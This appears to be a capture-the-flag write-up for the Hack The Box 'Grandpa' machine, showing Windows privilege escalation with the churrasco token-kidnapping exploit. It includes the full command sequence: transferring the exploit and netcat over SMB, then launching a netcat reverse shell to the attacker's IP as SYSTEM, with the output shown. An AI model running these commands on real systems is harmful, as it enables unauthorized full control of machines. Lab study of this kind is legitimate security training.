InfoSec LAB

Grandpa_Privilege_Escalation

Created: 2 min read

Token Kidnapping

churrasco Exploit. Effective against older systems with:

  • CVE-2008-1436
  • CVE-2009-0079
  • CVE-2008-1436
  • and many more
c:\WINDOWS\Temp\venom> copy \\10.10.14.6\smb\churrasco.exe
        1 file(s) copied.
 
c:\WINDOWS\Temp\venom> .\churrasco.exe
.\churrasco.exe
/churrasco/-->usage: Churrasco.exe [-d] "command to run"

Transferring the exploit binary to the target system over SMB The exploit seems to be straight forward

c:\WINDOWS\Temp\venom> copy \\10.10.14.6\smb\nc.exe
        1 file(s) copied.
 
c:\WINDOWS\Temp\venom> icacls nc.exe /grant Everyone:F
processed file: nc.exe
Successfully processed 1 files; Failed processing 0 files

I also uploaded Netcat to the target and gave it full permission, so that the exploit binary can access to it

c:\WINDOWS\Temp\venom>.\churrasco.exe -d "C:\WINDOWS\Temp\venom\nc.exe 10.10.14.6 1234 -e cmd"
/churrasco/-->current user: NETWORK SERVICE 
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->found rpcss pid: 668 
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->found thread: 672 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->found thread: 676 
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->found thread: 684 
/churrasco/-->thread impersonating, got network service token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!

Executing the exploit

┌──(kali㉿kali)-[~/archive/htb/labs/grandpa]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.14] 1037
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
 
c:\WINDOWS\TEMP> whoami
nt authority\system
 
c:\WINDOWS\TEMP> hostname
granpa
 
c:\WINDOWS\TEMP> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ip address. . . . . . . . . . . . : 10.10.10.14
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2

System Level Compromise

/// Note

Interactive Graph View

Backlinks